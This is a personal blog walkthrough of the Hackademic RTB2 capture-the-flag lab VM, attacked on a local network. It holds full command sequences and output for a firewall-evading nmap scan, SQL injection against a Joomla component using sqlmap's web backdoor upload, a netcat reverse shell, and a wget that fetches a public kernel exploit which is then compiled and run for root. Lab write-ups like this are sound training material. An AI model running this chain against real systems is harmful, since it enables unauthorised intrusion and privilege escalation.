This is the series 2 of Hackademic. Sure,It is Happy New Year walkthrough for me. Normally i really love sitting in front of my computer. My girlfriends also away from me so what am i doing right now.
I love the pain and try to write walkthrough at this time. Eventually, I am not good at english but still learning to explain for my reader. Cos,My childhood is so trouble.I am so late to enter the Computer field. I start at 25 year and try to learn many that i interest . Ok. Talk Less, Do More.
After discovering my local network i know my target is 192.168.2.101 and scan with nmap.
┌─[[email protected]]─[~/Desktop/rtb2] └──> nmap 192.168.2.101 Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 20:40 +0630 Nmap scan report for 192.168.2.101 Host is up (0.000075s latency). Not shown: 998 closed ports PORT STATE SERVICE 80/tcp open http 666/tcp filtered doom MAC Address: 08:00:27:23:34:E5 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
Normally port 80 is open but 666 port is filtered,
filtered meaning is firewall for packet filtering prevents.
Ok. We try nmap other option to filter bypass. I try to use MTU(Maximun Transmission Unit) to the packet bypass.
┌─[[email protected]]─[~/Desktop/rtb2] └──> nmap -mtu 24 192.168.2.101 Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 20:46 +0630 Nmap scan report for 192.168.2.101 Host is up (0.000098s latency). Not shown: 998 closed ports PORT STATE SERVICE 80/tcp open http 666/tcp open doom MAC Address: 08:00:27:23:34:E5 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
Yes. now both are opening. Try first with dirb scan.
┌─[[email protected]]─[~/Desktop/rtb2] └──> dirb http://192.168.2.101 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun Dec 31 20:48:22 2017 URL_BASE: http://192.168.2.101/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.2.101/ ---- + http://192.168.2.101/cgi-bin/ (CODE:403|SIZE:289) + http://192.168.2.101/check (CODE:200|SIZE:324) + http://192.168.2.101/index (CODE:200|SIZE:1324) + http://192.168.2.101/index.php (CODE:200|SIZE:1324) ==> DIRECTORY: http://192.168.2.101/javascript/ ==> DIRECTORY: http://192.168.2.101/phpmyadmin/ ----------------- END_TIME: Sun Dec 31 20:48:47 2017 DOWNLOADED: 46120 - FOUND: 11
Found phpmyadmin database login. But try to scan again the port 666.
┌─[[email protected]]─[~/Desktop/rtb2] └──> dirb http://192.168.2.101:666 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun Dec 31 20:50:41 2017 URL_BASE: http://192.168.2.101:666/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.2.101:666/ ---- ==> DIRECTORY: http://192.168.2.101:666/administrator/ ==> DIRECTORY: http://192.168.2.101:666/cache/ + http://192.168.2.101:666/cgi-bin/ (CODE:403|SIZE:290) ==> DIRECTORY: http://192.168.2.101:666/components/ + http://192.168.2.101:666/configuration (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.2.101:666/images/ ==> DIRECTORY: http://192.168.2.101:666/includes/ + http://192.168.2.101:666/index (CODE:200|SIZE:6118) + http://192.168.2.101:666/index.php (CODE:200|SIZE:6118) + http://192.168.2.101:666/index2 (CODE:200|SIZE:3559) ==> DIRECTORY: http://192.168.2.101:666/javascript/ ==> DIRECTORY: http://192.168.2.101:666/language/ ==> DIRECTORY: http://192.168.2.101:666/libraries/ + http://192.168.2.101:666/LICENSE (CODE:200|SIZE:17816) ==> DIRECTORY: http://192.168.2.101:666/logs/ ==> DIRECTORY: http://192.168.2.101:666/media/ ==> DIRECTORY: http://192.168.2.101:666/modules/ ==> DIRECTORY: http://192.168.2.101:666/phpmyadmin/ ==> DIRECTORY: http://192.168.2.101:666/plugins/ + http://192.168.2.101:666/robots (CODE:200|SIZE:304) + http://192.168.2.101:666/robots.txt (CODE:200|SIZE:304) + http://192.168.2.101:666/server-status (CODE:403|SIZE:295) ==> DIRECTORY: http://192.168.2.101:666/templates/ ==> DIRECTORY: http://192.168.2.101:666/tmp/
Interesting files are again! Check at the web browser.
First I try to port 80. I found user login,Try to login with sql login query but fail and I try to brute the username and password.It also fail after few minutes. So i check another port 666.
http://192.168.2.101:666/
I notice the icon at the title.Yes,It is joomla CMS. Explore some link on the site and i found the vulnerable at the letter paramter. Try to test vulnerable or not with single quote.
http://192.168.2.101:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...%27&Itemid=3
Boom! Error message greeting to me.
Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' GROUP BY title ORDER BY title' at line 1 SQL=SELECT id, title FROM jos_content WHERE state = 1 AND UPPER(title) LIKE 'List of content items...'%' GROUP BY title ORDER BY title LIST OF CONTENT ITEMS...'
Now time to exploit with sql map. Normally i try to find the current user, database name, tables and columns to dump the data but now i try first it allow os-shell upload.
┌─[[email protected]]─[~/Desktop/rtb2] └──> sqlmap -u "http://192.168.2.101:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" -p letter --is-dba --os-shell
[*] starting at 21:02:13
[21:02:14] [INFO] resuming back-end DBMS 'mysql'
[21:02:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: letter (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: option=com_abc&view=abc&letter=List of content items...' AND (SELECT 5790 FROM(SELECT COUNT(*),CONCAT(0x716b706271,(SELECT (ELT(5790=5790,1))),0x7162767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ycDm'='ycDm&Itemid=3
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: option=com_abc&view=abc&letter=List of content items...' UNION ALL SELECT CONCAT(0x716b706271,0x474b72455870676847716549514648576d77676c486b454d41696d6e786c65714d4143534855416f,0x7162767a71),NULL-- TSkf&Itemid=3
---
[21:02:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL >= 5.0
[21:02:14] [INFO] testing if current user is DBA
[21:02:14] [INFO] fetching current user
current user is DBA: True
[21:02:14] [INFO] going to use a web backdoor for command prompt
[21:02:14] [INFO] fingerprinting the back-end DBMS operating system
[21:02:14] [WARNING] reflective value(s) found and filtering out
[21:02:14] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[21:02:32] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[21:02:34] [INFO] retrieved web server absolute paths: '/index~.php'
[21:02:34] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[21:02:34] [WARNING] unable to upload the file stager on '/var/www/'
[21:02:34] [INFO] trying to upload the file stager on '/var/www/' via UNION method
[21:02:35] [WARNING] expect junk characters inside the file as a leftover from UNION query
[21:02:35] [INFO] the remote file '/var/www/tmpuuyqk.php' is larger (701 B) than the local file '/tmp/sqlmap5AvFX01768/tmpezMiOe' (700B)
[21:02:35] [INFO] heuristics detected web page charset 'ascii'
[21:02:35] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://192.168.2.101:666/tmpuuyqk.php
[21:02:35] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://192.168.2.101:666/tmpbkdzx.php
[21:02:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ls -al
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
total 288
drwxrwxrwx 19 p0wnbox p0wnbox 4096 Dec 31 16:32 .
drwxr-xr-x 16 root root 4096 Jan 17 2011 ..
-rw-rw-rw- 1 root root 76539 Nov 3 2010 CHANGELOG.php
-rw-rw-rw- 1 root root 1172 Jan 26 2010 COPYRIGHT.php
-rw-rw-rw- 1 root root 14918 Nov 2 2010 CREDITS.php
-rw-rw-rw- 1 root root 4344 Jan 26 2010 INSTALL.php
-rw-rw-rw- 1 root root 17816 Jan 17 2009 LICENSE.php
-rw-rw-rw- 1 root root 27986 Jan 26 2010 LICENSES.php
-rwxrwxrwx 1 root root 21697 Jan 17 2011 Untitledt.png
drwxrwxrwx 7 root root 4096 Nov 3 2010 _installation
drwxrwxrwx 2 root root 4096 Jan 22 2011 administrator
drwxrwxrwx 2 root root 4096 Nov 3 2010 cache
drwxrwxrwx 15 root root 4096 Jan 22 2011 components
-rw-rw-rw- 1 www-data www-data 1793 Jan 17 2011 configuration.php
-rw-rw-rw- 1 root root 3411 Jan 26 2010 configuration.php-dist
-rw-rw-rw- 1 root root 2773 Jan 26 2010 htaccess.txt
drwxrwxrwx 6 root root 4096 Nov 3 2010 images
drwxrwxrwx 8 root root 4096 Nov 3 2010 includes
-rw-rw-rw- 1 root root 2049 Jan 26 2010 index.php
-rw-rw-rw- 1 root root 588 Jan 26 2010 index2.php
drwxrwxrwx 4 root root 4096 Nov 3 2010 language
drwxrwxrwx 16 root root 4096 Nov 3 2010 libraries
drwxrwxrwx 2 root root 4096 Nov 3 2010 logs
drwxrwxrwx 3 root root 4096 Nov 3 2010 media
drwxrwxrwx 22 root root 4096 Nov 3 2010 modules
drwxr-xr-x 11 root root 4096 Jan 17 2011 [email protected]$!
drwxrwxrwx 11 root root 4096 Nov 3 2010 plugins
-rw-rw-rw- 1 root root 304 Aug 8 2006 robots.txt
drwxrwxrwx 7 root root 4096 Jan 17 2011 templates
drwxrwxrwx 2 root root 4096 Jan 22 2011 tmp
-rwxr-xr-x 1 www-data www-data 908 Dec 31 16:32 tmpbkdzx.php
-rw-rw-rw- 1 mysql mysql 0 Dec 31 16:32 tmpukgwv.php
-rw-rw-rw- 1 mysql mysql 701 Dec 31 16:32 tmpuuyqk.php
drwxrwxrwx 2 root root 4096 Jan 29 2011 welcome
drwxrwxrwx 4 root root 4096 Nov 3 2010 xmlrpc
-rw-rw-rw- 1 root root 177 Jan 17 2011 xxx.html
---
os-shell>
Now try to back connect with python,
─[[email protected]]─[~/Desktop/rtb2] └──> nc -lvp 6666 listening on [any] 6666 ... 192.168.2.101: inverse host lookup failed: Unknown host connect to [192.168.2.118] from (UNKNOWN) [192.168.2.101] 37336 /bin/sh: can't access tty; job control turned off $ python -c 'import pty;pty.spawn("/bin/bash")' [email protected]:/var/www$ id;uname -a id;uname -a uid=33(www-data) gid=33(www-data) groups=33(www-data) Linux HackademicRTB2 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686 GNU/Linux [email protected]:/var/www$
Try to find kernal exploit at exploit db. I notice last walkthrough kernal vesion exploit can be work. Ok,Try it.
drwx------ 2 gdm gdm 4096 Dec 31 2017 pulse-PKdhtXMmr18n [email protected]:/tmp$ wget https://www.exploit-db.com/raw/15285 -O lol.c --no-check-certificate <p$ wget https://www.exploit-db.com/raw/15285 -O lol.c --no-check-certificate --2017-12-31 16:37:22-- https://www.exploit-db.com/raw/15285 Resolving www.exploit-db.com... 192.124.249.8 Connecting to www.exploit-db.com|192.124.249.8|:443... connected. WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'. HTTP request sent, awaiting response... 200 OK Length: 7155 (7.0K) [text/plain] Saving to: `lol.c' 100%[======================================>] 7,155 --.-K/s in 0s 2017-12-31 16:37:23 (500 MB/s) - `lol.c' saved [7155/7155] [email protected]:/tmp$ gcc lol.c gcc lol.c [email protected]:/tmp$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) [email protected]:/tmp$ ./a.out ./a.out [*] Linux kernel >= 2.6.30 RDS socket exploit [*] by Dan Rosenberg [*] Resolving kernel addresses... [+] Resolved security_ops to 0xc08cac4c [+] Resolved default_security_ops to 0xc0773340 [+] Resolved cap_ptrace_traceme to 0xc02f5060 [+] Resolved commit_creds to 0xc016dd80 [+] Resolved prepare_kernel_cred to 0xc016e0c0 [*] Overwriting security ops... [*] Overwriting function pointer... [*] Triggering payload... [*] Restoring function pointer... [*] Got root! # id;whoami id;whoami uid=0(root) gid=0(root) root
Bango! Time to read the flag under the root file. Finally,I decode the base64 and get the secret photo!.
Thanks for reading, Happy Hacking!